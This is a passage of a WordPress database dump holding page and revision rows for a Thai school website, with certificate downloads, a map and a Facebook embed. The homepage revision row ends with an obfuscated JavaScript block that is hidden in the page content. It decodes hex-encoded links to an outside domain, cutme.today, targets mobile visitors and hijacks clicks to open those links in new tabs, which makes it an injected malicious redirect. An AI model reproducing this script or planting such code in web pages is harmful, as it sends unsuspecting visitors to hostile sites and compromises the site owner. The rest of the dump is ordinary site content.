class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-08-05 13:23:11','2025-08-05 06:23:11','',14,'http://pakhaeng.ssk.in.th/?p=1912',0,'revision','',0),
(1914,1,'2025-08-06 13:30:25','2025-08-06 06:30:25','','สีม่วง สีเขียว น่ารัก บ้าบิ่นมะพร้าวอ่อน โลโก้ (100 x 100 px) (150 x 150 px)','','inherit','','closed','','%e0%b8%aa%e0%b8%b5%e0%b8%a1%e0%b9%88%e0%b8%a7%e0%b8%87-%e0%b8%aa%e0%b8%b5%e0%b9%80%e0%b8%82%e0%b8%b5%e0%b8%a2%e0%b8%a7-%e0%b8%99%e0%b9%88%e0%b8%b2%e0%b8%a3%e0%b8%b1%e0%b8%81-%e0%b8%9a%e0%b9%89','','','2025-08-06 13:30:25','2025-08-06 06:30:25','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/สีม่วง-สีเขียว-น่ารัก-บ้าบิ่นมะพร้าวอ่อน-โลโก้-100-x-100-px-150-x-150-px.png',0,'attachment','image/png',0),
(1915,1,'2025-08-06 13:36:45','2025-08-06 06:36:45','<!-- wp:image {\"id\":1920,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1920\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1918,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf\",\"displayPreview\":false} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-7e1fe84f-e0fd-4360-9ceb-9123160e6ecc\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf\">เกียรติบัตรพหุปัญญา.วิทยากร</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-7e1fe84f-e0fd-4360-9ceb-9123160e6ecc\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1919,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf\",\"displayPreview\":false} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-26b2655f-f51f-48c0-9cd4-a1af52fbc0d9\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf\">เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-26b2655f-f51f-48c0-9cd4-a1af52fbc0d9\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','รวมเกียรติบัตร','','publish','closed','closed','','%e0%b8%a3%e0%b8%a7%e0%b8%a1%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b8%a2%e0%b8%a3%e0%b8%95%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%a3','','','2025-08-06 13:44:22','2025-08-06 06:44:22','',0,'http://pakhaeng.ssk.in.th/?page_id=1915',0,'page','',0),
(1916,1,'2025-08-06 13:36:45','2025-08-06 06:36:45','<!-- wp:kadence/iconlist {\"uniqueID\":\"1915_f212ca-96\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items1915_f212ca-96 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"1915_3114df-ae\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-1915_3114df-ae\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1BBFVJlgsdra2XZFblWu26SLU-AoOQW9h/view?usp=drive_link\">เกียรติบัตรพหุปัญญา.วิทยากร</a> ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"1915_69518c-67\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-1915_69518c-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1g7IX8PVy4NBFY9u30k9NC_DmcOE0Hgns/view?usp=drive_link\">เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ</a> ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"1915_ca2a27-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-1915_ca2a27-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','รวมเกียรติบัตร','','inherit','closed','closed','','1915-revision-v1','','','2025-08-06 13:36:45','2025-08-06 06:36:45','',1915,'http://pakhaeng.ssk.in.th/?p=1916',0,'revision','',0),
(1918,1,'2025-08-06 13:40:47','2025-08-06 06:40:47','','เกียรติบัตรพหุปัญญา.วิทยากร','','inherit','','closed','','%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b8%a2%e0%b8%a3%e0%b8%95%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%9e%e0%b8%ab%e0%b8%b8%e0%b8%9b%e0%b8%b1%e0%b8%8d%e0%b8%8d%e0%b8%b2-%e0%b8%a7%e0%b8%b4%e0%b8%97','','','2025-08-06 13:40:47','2025-08-06 06:40:47','',1915,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf',0,'attachment','application/pdf',0),
(1919,1,'2025-08-06 13:41:05','2025-08-06 06:41:05','','เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ','','inherit','','closed','','%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b8%a2%e0%b8%a3%e0%b8%95%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%9e%e0%b8%ab%e0%b8%b8%e0%b8%9b%e0%b8%b1%e0%b8%8d%e0%b8%8d%e0%b8%b2-%e0%b8%9c%e0%b8%b9%e0%b9%89','','','2025-08-06 13:41:05','2025-08-06 06:41:05','',1915,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf',0,'attachment','application/pdf',0),
(1920,1,'2025-08-06 13:44:05','2025-08-06 06:44:05','','Is It a Gift Instagram Post','','inherit','','closed','','is-it-a-gift-instagram-post-6','','','2025-08-06 13:44:05','2025-08-06 06:44:05','',1915,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/Is-It-a-Gift-Instagram-Post.png',0,'attachment','image/png',0),
(1921,1,'2025-08-06 13:44:21','2025-08-06 06:44:21','<!-- wp:image {\"id\":1920,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1920\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1918,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf\",\"displayPreview\":false} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-7e1fe84f-e0fd-4360-9ceb-9123160e6ecc\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf\">เกียรติบัตรพหุปัญญา.วิทยากร</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-7e1fe84f-e0fd-4360-9ceb-9123160e6ecc\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1919,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf\",\"displayPreview\":false} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-26b2655f-f51f-48c0-9cd4-a1af52fbc0d9\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf\">เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-26b2655f-f51f-48c0-9cd4-a1af52fbc0d9\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','รวมเกียรติบัตร','','inherit','closed','closed','','1915-revision-v1','','','2025-08-06 13:44:21','2025-08-06 06:44:21','',1915,'http://pakhaeng.ssk.in.th/?p=1921',0,'revision','',0),
(1922,1,'2025-08-06 13:44:22','2025-08-06 06:44:22','<!-- wp:image {\"id\":1920,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1920\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1918,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf\",\"displayPreview\":false} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-7e1fe84f-e0fd-4360-9ceb-9123160e6ecc\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf\">เกียรติบัตรพหุปัญญา.วิทยากร</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.วิทยากร.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-7e1fe84f-e0fd-4360-9ceb-9123160e6ecc\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":1919,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf\",\"displayPreview\":false} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-26b2655f-f51f-48c0-9cd4-a1af52fbc0d9\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf\">เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/เกียรติบัตรพหุปัญญา.ผู้เข้าร่วมโครงการ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-26b2655f-f51f-48c0-9cd4-a1af52fbc0d9\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','รวมเกียรติบัตร','','inherit','closed','closed','','1915-revision-v1','','','2025-08-06 13:44:22','2025-08-06 06:44:22','',1915,'http://pakhaeng.ssk.in.th/?p=1922',0,'revision','',0),
(1924,1,'2025-08-14 10:08:46','0000-00-00 00:00:00','','วารสาร','','draft','closed','','','','','','2025-08-14 10:08:46','2025-08-14 03:08:46','',0,'http://pakhaeng.ssk.in.th/?p=1924',0,'post','',0),
